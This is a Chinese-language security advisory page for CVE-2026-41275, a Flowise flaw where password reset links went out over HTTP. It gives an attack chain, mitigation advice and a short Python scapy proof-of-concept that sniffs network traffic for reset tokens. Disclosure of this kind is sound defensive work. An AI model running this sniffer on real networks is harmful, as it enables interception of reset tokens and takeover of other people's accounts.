CVE-2026-41275 CVSS 7.5 高危

CVE-2026-41275 Flowise密码重置中间人漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41275

漏洞类型

中间人攻击

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Flowise

漏洞概述

Flowise是一个用于构建定制大语言模型流程的拖放式用户界面。在3.1.0版本之前，其云服务cloud.flowiseai.com上的密码重置功能存在严重的安全缺陷。系统在发送密码重置链接时，使用了不安全的HTTP协议而非HTTPS加密协议。这种行为引入了中间人（MITM）攻击的风险，位于同一网络（例如公共Wi-Fi）下的攻击者可以拦截包含重置令牌的链接，从而获得对受害者账户的未授权访问。该漏洞在版本3.1.0中已被修复。

技术细节

该漏洞的核心在于应用程序未能对敏感的认证流程强制执行传输层安全（TLS）加密。在标准的密码重置流程中，服务器会生成一个一次性的重置令牌，并将其嵌入到URL中发送给用户。由于Flowise在3.1.0之前通过HTTP协议发送此链接，令牌在网络中以明文形式传输。攻击者可以通过ARP欺骗、DNS投毒或简单的网络嗅探（如在共享的公共Wi-Fi热点上开启混杂模式）来捕获受害者设备发出的HTTP请求或服务器返回的响应。一旦攻击者截获了包含有效令牌的重置链接，他们便可以在受害者点击该链接之前，利用该令牌向服务器发起密码修改请求。由于HTTP协议缺乏完整性验证，服务器无法区分请求是由合法受害者发起还是由攻击者发起，导致攻击者能够成功重置密码并接管账户，造成严重的数据泄露和权限滥用。

攻击链分析

STEP 1

步骤1

受害者在cloud.flowiseai.com发起密码重置请求。

STEP 2

步骤2

服务器生成重置令牌，并通过不安全的HTTP协议将重置链接发送给受害者。

STEP 3

步骤3

处于同一局域网或公共Wi-Fi下的攻击者进行流量嗅探，拦截受害者的网络数据包。

STEP 4

步骤4

攻击者从捕获的HTTP流量中解析出包含有效令牌的密码重置链接。

STEP 5

步骤5

攻击者主动向服务器提交该重置链接请求，设置新密码，从而接管受害者账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import scapy.all as scapy

def sniff_packet(interface):
    # Sniffing traffic on the specified interface to capture HTTP packets
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)

def process_sniffed_packet(packet):
    # Check if the packet has a TCP layer and Raw layer (payload)
    if packet.haslayer(scapy.TCP) and packet.haslayer(scapy.Raw):
        payload = packet[scapy.Raw].load
        # Convert payload to string for searching
        payload_str = payload.decode('utf-8', errors='ignore')
        # Look for password reset keywords in the HTTP stream
        if 'reset-password' in payload_str and 'token=' in payload_str:
            print(f"[+] Captured Potential Reset Link: {payload_str}")
            # Extract the specific URL (simplified logic)
            start = payload_str.find('http://')
            end = payload_str.find(' ', start)
            if start != -1:
                print(f"[+] Intercepted Token URL: {payload_str[start:end]}")

# Usage: Replace 'eth0' with the target network interface
# sniff_packet('eth0')

影响范围

Flowise < 3.1.0

防御指南

临时缓解措施

在未完成版本升级之前，建议用户避免在公共网络环境下进行密码重置操作。用户在收到重置邮件后，应手动检查链接是否以https://开头，若为http://，建议手动将协议头更改为https后再访问，或直接联系管理员处理。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表